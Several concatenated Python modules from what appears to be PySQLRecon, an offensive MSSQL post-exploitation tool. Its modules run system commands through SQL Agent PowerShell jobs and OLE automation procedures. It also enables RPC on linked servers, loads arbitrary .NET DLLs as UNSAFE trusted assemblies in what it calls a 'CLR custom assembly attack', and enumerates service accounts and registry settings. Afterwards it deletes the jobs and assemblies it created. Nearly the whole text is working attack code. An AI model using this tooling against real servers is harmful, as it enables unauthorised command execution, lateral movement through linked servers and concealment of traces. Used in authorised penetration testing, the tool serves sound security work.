import typer

from pysqlrecon.logger import logger
from pysqlrecon.lib import PySqlRecon

app = typer.Typer()
COMMAND_NAME = "enablerpc"
HELP = "[red][PRIV][/] Enable RPC and RPC Out on a linked server [I]"
LINK_COMPATIBLE = False
IMPERSONATE_COMPATIBLE = True


@app.callback(invoke_without_command=True)
def main(
    ctx: typer.Context,
    link: str = typer.Option(..., "--link", "-l", help="Linked server to enable RPC on")):
    
    pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']
    use_basic_tables = ctx.obj['basic_tables']

    # verify opts are compatible with module before connecting
    if not PySqlRecon.validate_opts(
        LINK_COMPATIBLE,
        IMPERSONATE_COMPATIBLE,
        pysqlrecon.link,
        pysqlrecon.impersonate
    ):
        exit()

    pysqlrecon.connect()

    logger.info(f"Enabling RPC on {link}")
    pysqlrecon.module_toggle("rpc", "true", link_host=link)
    pysqlrecon.check_rpc_on_link(link)
    pysqlrecon.print_results(use_basic_tables)

    pysqlrecon.disconnect()


import typer

from pysqlrecon.logger import logger
from pysqlrecon.lib import PySqlRecon

app = typer.Typer()
COMMAND_NAME = "agentcmd"
HELP = "[red][PRIV][/] Execute a system command using agent jobs [I,L]"
LINK_COMPATIBLE = True
IMPERSONATE_COMPATIBLE = True


@app.callback(invoke_without_command=True)
def main(
    ctx: typer.Context,
    command: str = typer.Option(..., '--command', help='Command to execute'),
    job_name: str = typer.Option(None, '--job', help='Agent job name to use (instead of randomly generated string)'),
    step_name: str = typer.Option(None, '--step', help='Agent step name to use (instead of randomly generated string)')):
    
    pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']
    use_basic_tables = ctx.obj['basic_tables']

    # verify opts are compatible with module before connecting
    if not PySqlRecon.validate_opts(
        LINK_COMPATIBLE,
        IMPERSONATE_COMPATIBLE,
        pysqlrecon.link,
        pysqlrecon.impersonate
    ):
        exit()

    pysqlrecon.connect()

    if pysqlrecon.link is not None:
        logger.info(f"Executing command in SQL Agent job on {pysqlrecon.link} via {pysqlrecon.target}")
    else:
        logger.info(f"Executing command in SQL Agent job on  {pysqlrecon.target}")

    if not pysqlrecon.get_agent_status():
        logger.warning("SQL agent is not running")
        pysqlrecon.disconnect()
        exit()

    if pysqlrecon.link is not None:
        if not pysqlrecon.check_rpc_on_link(pysqlrecon.link):
            logger.warning(f"RPC needs to enabled on {pysqlrecon.link}")
            pysqlrecon.disconnect()
            exit()

    job = pysqlrecon.add_agent_job(command, job_name, step_name)    
    
    pysqlrecon.get_agent_jobs()
    pysqlrecon.print_results(use_basic_tables)

    if job not in [item['name'] for item in pysqlrecon.ms_sql.rows if 'name' in item]:
        logger.warning(f"Error adding SQL agent job - {job} not found")
        pysqlrecon.disconnect()
        exit()


    logger.info(f"Executing job {job} and waiting 5 seconds...")
    pysqlrecon.exec_agent_job(job)
    pysqlrecon.delete_agent_job(job)

    logger.info(f"Deleted job {job}")

    pysqlrecon.get_agent_jobs()
    pysqlrecon.print_results(use_basic_tables)
    
    pysqlrecon.disconnect()


from pysqlrecon.logger import logger


class QueryMixin:

    # basic query handler for simple commands like
    #  whoami, databases, columns, users, etc.
    def query_handler(self, query) -> None:
        try:
            # execute linked query
            if self.link is not None:
                self.exec_lquery(query)

            # execute impersonation query
            elif self.impersonate is not None:
                self.exec_iquery(query)

             # otherwise, exec standard query
            else:
                self.ms_sql.sql_query(query)

            self.print_replies()
        except Exception as e:
            logger.error(str(e))
            logger.error("Error executing query... Exiting")
            self.disconnect()
            exit()


    # execute standard SQL query
    def exec_standard_query(self, query) -> None:
        if self.impersonate is not None:
            self.exec_iquery(query)
        else:
            self.ms_sql.sql_query(query)
        self.print_replies()
    

    # execute impersonation query
    def exec_iquery(self, query) -> None:
        logger.debug(f"Impersonating {self.impersonate} for query")
        query = f"EXECUTE AS LOGIN = '{self.impersonate}'; " + query
        self.ms_sql.sql_query(query)
        self.print_replies()
    

    # execute linked query
    def exec_lquery(self, query) -> None:
        query = query.replace("'", "''")
        #print(f"SELECT * FROM OPENQUERY(\"{self.link}\", '{query}')")
        self.ms_sql.sql_query(
            f"SELECT * FROM OPENQUERY(\"{self.link}\", '{query}')"
        )
        self.print_replies()


    # check if rcp is enabled on the linked server
    def check_rpc_on_link(self, link) -> bool:
        query = f"SELECT is_rpc_out_enabled FROM sys.servers WHERE lower(name) like '%{link.lower()}%';"
        self.exec_standard_query(query)
        
        if self.ms_sql.rows[0]['is_rpc_out_enabled'] == 0:
            return False
        
        return True
    

    # execute a query against a linked SQL server using 'EXECUTE (QUERY) AT HOSTNAME
    def exec_lquery_rpc(self, query) -> None:
        query = query.replace("'", "''")
        query = f"EXECUTE ('{query}') AT {self.link};"
        self.ms_sql.sql_query(query)
        self.print_replies()



import typer
from pysqlrecon.logger import init_logger, logger
from pysqlrecon.lib import PySqlRecon
from pysqlrecon.modules import __all__
from pysqlrecon import __version__

app = typer.Typer(
    add_completion=False,
    rich_markup_mode='rich',
    context_settings={'help_option_names': ['-h', '--help']},
    pretty_exceptions_show_locals=False
)

for command in __all__:
    app.add_typer(
        command.app,
        name=command.COMMAND_NAME,
        help=command.HELP
    )


@app.callback(no_args_is_help=True)
def main(
    # context for passing global args
    ctx: typer.Context,
    
    # SQL Options
    port: int = typer.Option(1433, '--port', help='Target MSSQL port', rich_help_panel='SQL Options'),
    db: str = typer.Option('master', '--database', help='Database name to authenticate to or query', rich_help_panel='SQL Options'),
    link: str = typer.Option(None, '--link', help='Linked server hostname', rich_help_panel='SQL Options'),
    impersonate: str = typer.Option(None, '--impersonate', help='Impersonate a user', rich_help_panel='SQL Options'),

    # Authentication Options
    usernname: str = typer.Option(..., '--username', '-u', help='Username', rich_help_panel='Authentication Options'),
    password: str = typer.Option(None, '--password', '-p', help='Password', rich_help_panel='Authentication Options'),
    domain: str = typer.Option(None, '--domain', '-d', help='Domain', rich_help_panel='Authentication Options'),
    target: str = typer.Option(..., '--target', '-t', help='Target SQL server hostname or IP address', rich_help_panel='Authentication Options'),
    sql_auth: bool = typer.Option(False, '--sql-auth', help='Use SQL authentication', rich_help_panel='Authentication Options'),
    hashes: str = typer.Option(None, '--hashes', metavar="LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH', rich_help_panel='Authentication Options'),
    no_pass: bool = typer.Option(False, '--no-pass', help='Don\'t ask for password (useful for -k)', rich_help_panel='Authentication Options'),
    kerberos: bool = typer.Option(False, '-k', '--kerberos', help='Use Kerberos authentication. Grabs credentials from ccache file '
                                        '(KRB5CCNAME) based on target parameters', rich_help_panel='Authentication Options'),
    aesKey: str = typer.Option(None, '--aesKey', help='AES key to use for Kerberos Authentication (128 or 256 bits)', rich_help_panel='Authentication Options'),
    dc_ip: str = typer.Option('', '--dc-ip', help='Domain controller IP or hostname', rich_help_panel='Authentication Options'),
    
    # Misc Options
    debug: bool = typer.Option(False, '--debug', help='Turn DEBUG output ON', rich_help_panel='Misc Options'),
    basic_tables: bool = typer.Option(False, '--basic-tables', help='Use simple ASCII table output', rich_help_panel='Misc Options'),
    quiet: bool = typer.Option(False, '--quiet', help='Hide the banner', rich_help_panel='Misc Options')):

    if not quiet:
        banner()

    init_logger(debug)

    if impersonate is not None and link is not None:
        logger.warning("Cannot use --impersonate and --link together")
        exit()

    # accesing a link may require Kerberos auth
    if link is not None and kerberos is False:
        logger.warning("Querying a linked server may require specifying Kerberos authentication")

    windows_auth = True if sql_auth is False else False
    pysqlrecon = PySqlRecon(
        target,
        domain,
        usernname,
        password,
        port,
        link,
        impersonate,
        db,
        hashes,
        aesKey,
        kerberos,
        no_pass,
        dc_ip,
        windows_auth
    )

    ctx.obj = {
        'pysqlrecon': pysqlrecon,
        'basic_tables': basic_tables
    }


def banner():
    print(f'''                                       
        _____     _____ _____ __    _____                 
       |  _  |_ _|   __|     |  |  | __  |___ ___ ___ ___ 
       |   __| | |__   |  |  |  |__|    -| -_|  _| . |   |
       |__|  |_  |_____|__  _|_____|__|__|___|___|___|_|_|  v{__version__}
             |___|        |__|                            
    ''')


if __name__ == '__main__':
    app(prog_name='pysqlrecon')



import typer

from pysqlrecon.logger import logger
from pysqlrecon.lib import PySqlRecon

app = typer.Typer()
COMMAND_NAME = "disableole"
HELP = "[red][PRIV][/] Disable OLE automation procedures [I,L]"
LINK_COMPATIBLE = True
IMPERSONATE_COMPATIBLE = True


@app.callback(invoke_without_command=True)
def main(ctx: typer.Context):

    pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']
    use_basic_tables = ctx.obj['basic_tables']

    # verify opts are compatible with module before connecting
    if not PySqlRecon.validate_opts(
        LINK_COMPATIBLE,
        IMPERSONATE_COMPATIBLE,
        pysqlrecon.link,
        pysqlrecon.impersonate
    ):
        exit()

    pysqlrecon.connect()

    if pysqlrecon.link is not None:        
        if not pysqlrecon.validate_link():
            logger.warning(f"{pysqlrecon.link} is not a linked server")
            pysqlrecon.disconnect()
            exit()

        logger.info(f"Disabling OLE automation procedures on {pysqlrecon.link} via {pysqlrecon.target}")
        pysqlrecon.linked_module_toggle("OLE Automation Procedures", "0")

        pysqlrecon.linked_check_module("OLE Automation Procedures")
        pysqlrecon.print_results(use_basic_tables)

    else:
        logger.info(f"Disabling OLE automation procedures on {pysqlrecon.target}")
        pysqlrecon.module_toggle("OLE Automation Procedures", "0")
        pysqlrecon.check_module("OLE Automation Procedures")
        pysqlrecon.print_results(use_basic_tables)

    pysqlrecon.disconnect()



class ClrMixin:

    # check if trusted assembly already exists
    def check_asm_hash(self, hash) -> bool:
        query = f"SELECT * FROM sys.trusted_assemblies where hash = 0x{hash};"

        if self.link is not None:
            self.exec_lquery(query)
        else:
            self.exec_standard_query(query)
        
        if hash.encode() in [row['hash'] for row in self.ms_sql.rows]:
            return True
        
        return False


    # add trusted assembly to SQL server
    def add_trusted_asm(self, dll_path, hash) -> None:
        query =  f"EXEC sp_add_trusted_assembly 0x{hash},N'{dll_path}" \
                  ", version=0.0.0.0, culture=neutral, publickeytoken=null, processorarchitecture=msil';"
        
        if self.link is not None:
            self.exec_lquery_rpc(query)
        else:
            self.exec_standard_query(query)


    # delete procedure and assembly associated with trusted assembly
    def delete_tasm_resources(self, asm_name, function, is_function=False) -> None:
        if is_function:
            drop_proc = f"DROP FUNCTION IF EXISTS {function};"
        else:
            drop_proc = f"DROP PROCEDURE IF EXISTS {function};"
        drop_asm = f"DROP ASSEMBLY IF EXISTS {asm_name};"

        if self.link is not None:
            self.exec_lquery_rpc(drop_proc)
            self.exec_lquery_rpc(drop_asm)
        else:
            self.exec_standard_query(drop_proc)
            self.exec_standard_query(drop_asm)


    # delete a trusted assembly on SHA-512 hash
    def delete_tasm(self, hash) -> None:
        query = f"EXEC sp_drop_trusted_assembly 0x{hash};"

        if self.link is not None:
            self.exec_lquery_rpc(query)
        else:
            self.exec_standard_query(query)


    # check if an assembly already exists
    def check_assembly(self, asm_name) -> bool:
        query = f"SELECT * FROM sys.assemblies where name = '{asm_name}';"

        if self.link is not None:
            self.exec_lquery(query)
        else:
            self.exec_standard_query(query)

        if asm_name in [row['name'] for row in self.ms_sql.rows]:
            return True
        
        return False


    # create new custom assembly
    def create_asm(self, asm_name, dll_bytes) -> None:
        query = f"CREATE ASSEMBLY {asm_name} FROM 0x{dll_bytes} WITH PERMISSION_SET = UNSAFE;"

        if self.link is not None:
            self.exec_lquery_rpc(query)
        else:
            self.exec_standard_query(query)


    # check if a stored procedure already exists
    def check_asm_sp(self, function) -> bool:
        query = "SELECT SCHEMA_NAME(schema_id), name FROM sys.procedures WHERE type = 'PC';"

        if self.link is not None:
            self.exec_lquery(query)
        else:
            self.exec_standard_query(query)

        if function in [row['name'] for row in self.ms_sql.rows]:
            return True
        
        return False
    

    # check if a function already exists
    def check_asm_func(self, function) -> bool:
        query = "SELECT * FROM sys.assembly_modules;"

        if self.link is not None:
            self.exec_lquery(query)
        else:
            self.exec_standard_query(query)

        if function in [row['assembly_class'] for row in self.ms_sql.rows]:
            return True

        return False


    # create stored procedure for custom assembly
    def create_asm_sp(self, asm_name, function, procedure=None) -> None:
        if procedure is None:
            query = f"CREATE PROCEDURE [dbo].[{function}]" \
                    f"AS EXTERNAL NAME [{asm_name}].[StoredProcedures].[{function}]"
        else:
            query = procedure
        
        if self.link is not None:
            self.exec_lquery_rpc(query)
        else:
            # need to break out of normal impersonation workflow here
            if not self.impersonate:
                self.exec_standard_query(query)
            else:
                self.ms_sql.sql_query(f"EXECUTE AS LOGIN = '{self.impersonate}';")
                self.print_replies()
                self.ms_sql.sql_query(query)
                self.print_replies()


    # execute functuon for custom assembly
    def exec_asm_sp(self, function) -> None:
        query = f"EXEC {function}"

        if self.link is not None:
            self.exec_lquery_rpc(query)
        else:
            self.exec_standard_query(query)


import typer

from pysqlrecon.logger import logger
from pysqlrecon.lib import PySqlRecon

app = typer.Typer()
COMMAND_NAME = "olecmd"
HELP = "[red][PRIV][/] Execute a system command using OLE automation procedures [I,L]"
LINK_COMPATIBLE = True
IMPERSONATE_COMPATIBLE = True


@app.callback(invoke_without_command=True)
def main(
    ctx: typer.Context,
    command: str = typer.Option(..., '--command', help='Command to execute')):
    
    pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']

    # verify opts are compatible with module before connecting
    if not PySqlRecon.validate_opts(
        LINK_COMPATIBLE,
        IMPERSONATE_COMPATIBLE,
        pysqlrecon.link,
        pysqlrecon.impersonate
    ):
        exit()

    pysqlrecon.connect()

    if pysqlrecon.link is not None:
        logger.info(f"Executing system command on {pysqlrecon.link} via {pysqlrecon.target}")  
        if pysqlrecon.linked_check_module("Ole Automation Procedures"):
            pysqlrecon.ole_cmd(command)
        else:
            logger.warning(f"Ole automation procedures are not enabled on {pysqlrecon.link}")

    else:
        logger.info(f"Executing system command on {pysqlrecon.target}")
        if pysqlrecon.check_module("Ole Automation Procedures"):
            pysqlrecon.ole_cmd(command)
        else:
            logger.warning("Ole automation procedures are not enabled")

    pysqlrecon.disconnect()


import random
import string

from pysqlrecon.logger import logger


class SqlAgentMixin:
    
    # get SQL agent status
    def get_agent_status(self) -> bool:
        query = "SELECT dss.[status], dss.[status_desc] FROM sys.dm_server_services dss \n" \
            "WHERE dss.[servicename] LIKE 'SQL Server Agent (%';"
    
        if self.link is not None:
            self.exec_lquery(query)
        else:
            self.exec_standard_query(query)

        if "running" not in self.get_last_resp("status_desc").lower():
            return False
        
        return True
        

    # get SQL agent jobs
    def get_agent_jobs(self) -> None:
        query = "SELECT job_id, name, enabled, date_created, date_modified\n" \
            "FROM msdb.dbo.sysjobs ORDER BY date_created"
        
        if self.link is not None:
            self.exec_lquery(query)
        else:
            self.exec_standard_query(query)
    

    # run a command via SQL agent jobs
    def add_agent_job(self, cmd, job_name=None, step_name=None) -> str:
        if job_name is None:
            job_name = ''.join(random.choices(string.ascii_letters + string.digits, k=8)) 
        
        if step_name is None:
            step_name = ''.join(random.choices(string.ascii_letters + string.digits, k=8))

        logger.info(f"Setting job_name to '{job_name}'")
        logger.info(f"Setting step_name to '{step_name}'")

        query = "use msdb;\n" \
            f"EXEC dbo.sp_add_job @job_name = '{job_name}';\n" \
            f"EXEC sp_add_jobstep @job_name = '{job_name}', \n" \
            f"@step_name = '{step_name}', \n" \
            "@subsystem = 'PowerShell', \n" \
            f"@command = '{cmd}', \n" \
            "@retry_attempts = 1, \n" \
            "@retry_interval = 5;\n" \
            f"EXEC dbo.sp_add_jobserver @job_name = '{job_name}';"
        
        if self.link is not None:
            self.exec_lquery_rpc(query)
        else:
            self.exec_standard_query(query)

        return job_name
    

    # run a SQL agent job
    def exec_agent_job(self, job_name) -> None:
        query = "use msdb;" \
                f"EXEC dbo.sp_start_job '{job_name}';" \
                "WAITFOR DELAY '00:00:05';"
        
        if self.link is not None:
            self.exec_lquery_rpc(query)
        else:
            self.exec_standard_query(query)


    # delete a SQL agent job
    def delete_agent_job(self, job_name) -> None:
        query = "use msdb;\n" \
                f"EXEC dbo.sp_delete_job  @job_name = '{job_name}';"
        
        if self.link is not None:
            self.exec_lquery_rpc(query)
        else:
            self.exec_standard_query(query)


from pysqlrecon.modules import checkrpc, columns, databases, impersonate, info, \
                                links, query, rows, search, smb, tables, users, whoami, \
                                enablexp, disablexp, xpcmd, enablerpc, disablerpc, enableole,\
                                disableole, enableclr, disableclr, olecmd, agentstatus, agentcmd, \
                                clr, adsi

__all__ = [
    checkrpc,
    columns,
    databases,
    impersonate,
    info,
    links,
    query,
    rows,
    search,
    smb,
    tables,
    users,
    whoami,

    # priv modules
    enablexp,
    disablexp,
    xpcmd,
    enablerpc,
    disablerpc,
    enableole,
    disableole,
    enableclr,
    disableclr,
    clr,
    olecmd,
    agentstatus,
    agentcmd,
    adsi
]


import logging
from rich.logging import RichHandler
from rich.console import Console

console = Console()

FORMAT = "%(message)s"

OBJ_EXTRA_FMT = {
    "markup": True,
    "highlighter": False
}

logger = logging.getLogger(__name__)

def init_logger(debug):
    richHandler = RichHandler(
        omit_repeated_times=False,
        show_path=False,
        keywords=[],
        console=console
    )
    
    if debug:
        logger.setLevel(logging.DEBUG)
    else:
        logger.setLevel(logging.INFO)

    richHandler.setFormatter(
        logging.Formatter(
            FORMAT,
            datefmt='[%X]'
        )
    )
    logger.addHandler(richHandler)


import typer
import string
import random
from pathlib import Path
from hashlib import sha512

from pysqlrecon.lib.exceptions import DuplicateAssemblyError
from pysqlrecon.logger import logger
from pysqlrecon.lib import PySqlRecon

app = typer.Typer()
COMMAND_NAME = "clr"
HELP = "[red][PRIV][/] Load and execute a .NET assembly in a stored procedure [I,L]"
LINK_COMPATIBLE = True
IMPERSONATE_COMPATIBLE = True


@app.callback(invoke_without_command=True)
def main(
    ctx: typer.Context,
    dll: Path = typer.Option(..., "--dll", dir_okay=False, readable=True, help=".NET DLL to load into stored procedure"),
    function: str = typer.Option(..., "--function", help="Function within .NET DLL to execute")):
    
    pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']

    # verify opts are compatible with module before connecting
    if not PySqlRecon.validate_opts(
        LINK_COMPATIBLE,
        IMPERSONATE_COMPATIBLE,
        pysqlrecon.link,
        pysqlrecon.impersonate
    ):
        exit()

    pysqlrecon.connect()

    # get dll bytes and SHA-512 hash
    dll_bytes = dll.read_bytes().hex()
    dll_hash = sha512(dll.read_bytes()).hexdigest()

    dll_path = ''.join(random.choices(string.ascii_letters, k=8))
    asm_name = ''.join(random.choices(string.ascii_letters, k=8))

    ####
    # Ensure pre-requisites are met
    if pysqlrecon.link is not None:
        logger.info(f"Performing CLR custom assembly attack on {pysqlrecon.link} via {pysqlrecon.target}")
        if not pysqlrecon.linked_check_module("clr enabled"):
            logger.warning(f"CLR integration is not enabled on {pysqlrecon.link}")
            pysqlrecon.disconnect()
            exit()

        if not pysqlrecon.check_rpc_on_link(pysqlrecon.link):
            logger.warning(f"RPC needs to be enabled on {pysqlrecon.link}")
            pysqlrecon.disconnect()
            exit()
    else:
        logger.info(f"Performing CLR custom assembly attack on {pysqlrecon.target}")
        if not pysqlrecon.check_module("clr enabled"):
            logger.warning("CLR integration is not enabled")
            pysqlrecon.disconnect()
            exit()
    
    ####
    # Check if DLL hash already exists in sys.trusted_assemblies
    #   and delete it if it does
    if pysqlrecon.check_asm_hash(dll_hash):
        logger.warning("Assembly hash already exists in sys.trusted_assesmblies")
        logger.info("Dropping existing assembly before continuing")
        pysqlrecon.delete_tasm(dll_hash)

    ####
    # Add the DLL to sys.trusted_assemblies
    pysqlrecon.add_trusted_asm(dll_path, dll_hash)
    if not pysqlrecon.check_asm_hash(dll_hash):
        logger.error("Failed to add trusted assembly")
        pysqlrecon.disconnect()
        exit()

    logger.info(f"Added SHA-512 hash for '{dll.name}' to sys.trusted_assemblies with a random name of '{dll_path}'")
    logger.debug(f"SHA-512 hash of DLL: {dll_hash}")

    # make sure procedure and assembly names are free
    pysqlrecon.delete_tasm_resources(asm_name, function)
    
    logger.info(f"Creating a new custom assembly with the name '{asm_name}'")

    #####
    # Create the custom assembly
    create_assembly(pysqlrecon, asm_name, dll_bytes, function)
    
    if not pysqlrecon.check_assembly(asm_name):
        logger.error("Failed to create custom assembly")
        logger.info("Cleaning up...")
        pysqlrecon.delete_tasm(dll_hash)
        pysqlrecon.delete_tasm_resources(asm_name, function)
        pysqlrecon.disconnect()
        exit()

    ####
    # Create the stored procedure
    logger.info(f"Loading DLL into stored procedure '{function}'")
    pysqlrecon.create_asm_sp(asm_name, function)

    if not pysqlrecon.check_asm_sp(function):
        logger.warning("Unable to load DLL into custom stored procedure")
        logger.info("Cleaning up...")
        pysqlrecon.delete_tasm(dll_hash)
        pysqlrecon.delete_tasm_resources(asm_name, function)
        pysqlrecon.disconnect()
        exit()

    logger.info(f"Created '[{asm_name}].[StoredProcedures].[{function}]'")
    
    ####
    # Execute the stored procedure/assemby
    logger.info("Executing payload...")
    pysqlrecon.exec_asm_sp(f"{function}")

    ####
    # Cleanup!
    logger.info("Cleaning up...")
    pysqlrecon.delete_tasm(dll_hash)
    pysqlrecon.delete_tasm_resources(asm_name, function)

    pysqlrecon.disconnect()


# recursive func to create assembly and handle duplicate assmebly error by deleting and re-creating
#   fix for https://github.com/Tw1sm/PySQLRecon/issues/1
def create_assembly(pysqlrecon, asm_name, dll_bytes, function):
    try:
        pysqlrecon.create_asm(asm_name, dll_bytes)

    except DuplicateAssemblyError as e:
        logger.warning("Duplicate assembly detected - will try to delete and re-create")
        
        pysqlrecon.delete_tasm_resources(e.assembly_name, function)
        logger.info(f"Deleted the offending duplicate assembly '{e.assembly_name}'")

        logger.info(f"Attempting to re-create assembly with name '{asm_name}'")
        pysqlrecon.create_asm(asm_name, dll_bytes)

        


import typer

from pysqlrecon.logger import logger, console
from pysqlrecon.lib import PySqlRecon

app = typer.Typer()
COMMAND_NAME = "info"
HELP = "[bright_black][NORM][/] Gather information about the SQL server"
LINK_COMPATIBLE = False
IMPERSONATE_COMPATIBLE = False


@app.callback(invoke_without_command=True)
def main(ctx: typer.Context):
    
    info = {
        'ComputerName': '',
        'DomainName': '',
        'ServicePid': '',
        'ServiceName': '',
        'ServiceAccount': '',
        'AuthenticationMode': '',
        'ForcedEncryption': '',
        'Clustered': '',
        'SqlServerVersionNumber': '',
        'SqlServerMajorVersion': '',
        'SqlServerEdition': '',
        'SqlServerServicePack': '',
        'OsArchitecture': '',
        'OsMachineType': '',
        'OsVersion': '',
        'OsVersionNumber': '',
        'CurrentLogin': '',
        'IsSysAdmin': '',
        'ActiveSessions': ''
    }
    
    pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']
    
    # verify opts are compatible with module before connecting
    if not PySqlRecon.validate_opts(
        LINK_COMPATIBLE,
        IMPERSONATE_COMPATIBLE,
        pysqlrecon.link,
        pysqlrecon.impersonate
    ):
        exit()

    pysqlrecon.connect()

    logger.info("Extracting SQL server information")

    pysqlrecon.query_handler("SELECT IS_SRVROLEMEMBER('sysadmin');")
    if pysqlrecon.get_last_resp() == 1:
        info['IsSysAdmin'] = True
        logger.debug("User is sysadmin")
    else:
        info['IsSysAdmin'] = False
        # these require sysadmin in SQLRecon
        del info['OsMachineType']
        del info['OsVersion']

        logger.debug("User is not sysadmin")
    
    ####
    # ComputerName
    pysqlrecon.query_handler("SELECT @@SERVERNAME;")
    info['ComputerName'] = pysqlrecon.get_last_resp()

    ####
    # DomainName
    pysqlrecon.query_handler("SELECT default_domain();")
    info['DomainName'] = pysqlrecon.get_last_resp()

    ####
    # ServicePid
    query = "SELECT CONVERT(VARCHAR(255), SERVERPROPERTY('processid'));"
    pysqlrecon.query_handler(query)
    info['ServicePid'] = pysqlrecon.get_last_resp().decode('utf-8')

    ####
    # ServiceName
    query = "DECLARE @SQLServerServiceName varchar(250)\n" \
            "DECLARE @SQLServerInstance varchar(250)\n" \
            "if @@SERVICENAME = 'MSSQLSERVER'\n" \
            "BEGIN\n" \
            "set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQLSERVER'\n" \
            "set @SQLServerServiceName = 'MSSQLSERVER'\n" \
            "END\n" \
            "ELSE\n" \
            "BEGIN\n" \
            "set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQL$'+cast(@@SERVICENAME as varchar(250))\n" \
            "set @SQLServerServiceName = 'MSSQL$'+cast(@@SERVICENAME as varchar(250))\n" \
            "END\n" \
            "SELECT @SQLServerServiceName;"
    pysqlrecon.query_handler(query)
    info['ServiceName'] = pysqlrecon.get_last_resp().decode('utf-8')

    ####
    # ServiceAccount
    query = "DECLARE @SQLServerInstance varchar(250)\n" \
            "if @@SERVICENAME = 'MSSQLSERVER'\n" \
            "BEGIN\n" \
            "set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQLSERVER'\n" \
            "END\n" \
            "ELSE\n" \
            "BEGIN\n" \
            "set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQL$'+cast(@@SERVICENAME as varchar(250))\n" \
            "END\n" \
            "DECLARE @ServiceAccountName varchar(250)\n" \
            "EXECUTE master.dbo.xp_instance_regread\n" \
            "N'HKEY_LOCAL_MACHINE', @SQLServerInstance,\n" \
            "N'ObjectName',@ServiceAccountName OUTPUT, N'no_output'\n" \
            "SELECT @ServiceAccountName;"
    
    pysqlrecon.query_handler(query)
    info['ServiceAccount'] = pysqlrecon.get_last_resp().decode('utf-8')

    ####
    # AuthenticationMode
    query = "DECLARE @AuthenticationMode INT\n" \
            "EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE',\n" \
            "N'Software\Microsoft\MSSQLServer\MSSQLServer',\n" \
            "N'LoginMode', @AuthenticationMode OUTPUT\n" \
            "(SELECT CASE @AuthenticationMode\n" \
            "WHEN 1 THEN 'Windows Authentication'\n" \
            "WHEN 2 THEN 'Windows and SQL Server Authentication'\n" \
            "ELSE 'Unknown'\n" \
            "END);"
    pysqlrecon.query_handler(query)
    info['AuthenticationMode'] = pysqlrecon.get_last_resp().decode('utf-8')

    ####
    # ForcedEncryption
    query = "BEGIN TRY\n" \
            "DECLARE @ForcedEncryption INT\n" \
            "EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE',\n" \
            "N'SOFTWARE\MICROSOFT\Microsoft SQL Server\MSSQLServer\SuperSocketNetLib',\n" \
            "N'ForceEncryption', @ForcedEncryption OUTPUT\n" \
            "END TRY\n" \
            "BEGIN CATCH	            \n" \
            "END CATCH\n" \
            "SELECT @ForcedEncryption;"
    pysqlrecon.query_handler(query)
    info['ForcedEncryption'] = pysqlrecon.get_last_resp()

    ####
    # Clustered
    query = "SELECT CASE  SERVERPROPERTY('IsClustered')\n" \
            "WHEN 0\n" \
            "THEN 'No'\n" \
            "ELSE 'Yes'\n" \
            "END"
    pysqlrecon.query_handler(query)
    info['Clustered'] = pysqlrecon.get_last_resp().decode('utf-8')

    ####
    # SqlServerVersionNumber
    query = "SELECT CONVERT(VARCHAR(255), SERVERPROPERTY('productversion'));"
    pysqlrecon.query_handler(query)
    info['SqlServerVersionNumber'] = pysqlrecon.get_last_resp().decode('utf-8')

    ####
    # SqlServerMajorVersion
    query = "SELECT SUBSTRING(@@VERSION, CHARINDEX('2', @@VERSION), 4);"
    pysqlrecon.query_handler(query)
    info['SqlServerMajorVersion'] = pysqlrecon.get_last_resp()

    ####
    # SqlServerEdition
    query = "SELECT CONVERT(VARCHAR(255), SERVERPROPERTY('Edition'));"
    pysqlrecon.query_handler(query)
    info['SqlServerEdition'] = pysqlrecon.get_last_resp().decode('utf-8')

    ####
    # SqlServerServicePack
    query = "SELECT CONVERT(VARCHAR(255), SERVERPROPERTY('ProductLevel'));"
    pysqlrecon.query_handler(query)
    info['SqlServerServicePack'] = pysqlrecon.get_last_resp().decode('utf-8')

    ####
    # OsArchitecture
    query = "SELECT SUBSTRING(@@VERSION, CHARINDEX('x', @@VERSION), 3);"
    pysqlrecon.query_handler(query)
    info['OsArchitecture'] = pysqlrecon.get_last_resp()

    ####
    # OsMachineType
    if info['IsSysAdmin']:
        query = "DECLARE @MachineType  SYSNAME\n" \
                "EXECUTE master.dbo.xp_regread\n" \
                "@rootkey		= N'HKEY_LOCAL_MACHINE',\n" \
                "@key			= N'SYSTEM\CurrentControlSet\Control\ProductOptions',\n" \
                "@value_name		= N'ProductType',\n" \
                "@value			= @MachineType output\n" \
                "SELECT @MachineType;"
        pysqlrecon.query_handler(query)
        info['OsMachineType'] = pysqlrecon.get_last_resp()

    ####
    # OsVersion
    if info['IsSysAdmin']:
        query = "DECLARE @ProductName  SYSNAME\n" \
                "EXECUTE master.dbo.xp_regread\n" \
                "@rootkey		= N'HKEY_LOCAL_MACHINE',\n" \
                "@key			= N'SOFTWARE\Microsoft\Windows NT\CurrentVersion',\n" \
                "@value_name		= N'ProductName',\n" \
                "@value			= @ProductName output\n" \
                "SELECT @ProductName;"
        pysqlrecon.query_handler(query)
        info['OsVersion'] = pysqlrecon.get_last_resp()

    ####
    # OsVersionNumber
    query = "SELECT RIGHT(SUBSTRING(@@VERSION, CHARINDEX('Windows Server', @@VERSION), 19), 4);"
    pysqlrecon.query_handler(query)
    info['OsVersionNumber'] = pysqlrecon.get_last_resp()

    ####
    # CurrentLogin
    pysqlrecon.query_handler("SELECT SYSTEM_USER;")
    info['CurrentLogin'] = pysqlrecon.get_last_resp()

    ####
    # ActiveSessions
    query = "SELECT COUNT(*) FROM [sys].[dm_exec_sessions] WHERE status = 'running';"
    pysqlrecon.query_handler(query)
    info['ActiveSessions'] = pysqlrecon.get_last_resp()

    # display results
    print()
    for key, val in info.items():
        key += ':'
        console.print(f"{' |->':>15} {key:25} {val}")
    print()

    pysqlrecon.disconnect()